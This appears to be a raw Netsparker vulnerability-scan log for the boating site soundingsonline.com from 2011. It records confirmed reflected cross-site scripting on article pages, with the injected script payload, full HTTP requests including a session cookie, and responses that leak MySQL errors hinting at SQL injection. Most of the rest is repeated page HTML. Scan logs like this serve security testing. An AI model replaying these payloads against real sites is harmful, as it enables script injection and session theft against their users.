document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"..
- /boat-shop/new-boats/272122-cabo-44-htx-comfort-meets-hardcore-fishing

/boat-shop/new-boats/272122-cabo-44-htx-comfort-meets-hardcore-fishing CONFIRMED

http://www.soundingsonline.com/boat-shop/new-boats/272122-cabo-44-htx-comfort-meets-hardcore-fishing..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002471)</script>

Request

GET /boat-shop/new-boats/272122-cabo-44-htx-comfort-meets-hardcore-fishing?'"--></style></script><script>netsparker(0x002471)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002471)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002471)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/new-boats/272122-cabo-44-htx-comfort-meets-hardcore-fishing" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
Cabo Yahct
Fishing boat" /> <meta name="title" content="Cabo 44 HTX: comfort meets hardcore fishing" /> <meta name="author" content="Chris Landry" /> <meta name="description" content="Cabo Yachts
Cabo 44 HTX" /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Cabo 44 HTX: comfort meets hardcore fishing</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_new_boats m_new_boats"><!--
Type of page: article<br />Section: 6, s_boat_shop<br />Category: 47, c_new_boats<br />Menu: 62, m_new_boats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span></a></li><li class="item232"><a href="http://www.barkerstores.com/soundings/">&l..
- /news/todays-top-stories/276012-boat-swims-in-gasoline

/news/todays-top-stories/276012-boat-swims-in-gasoline CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/276012-boat-swims-in-gasoline?'%22--%3E%3C/st..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002472)</script>

Request

GET /news/todays-top-stories/276012-boat-swims-in-gasoline?'"--></style></script><script>netsparker(0x002472)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002472)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002472)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/276012-boat-swims-in-gasoline" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Boat swims in gasoline" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boat swims in gasoline</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
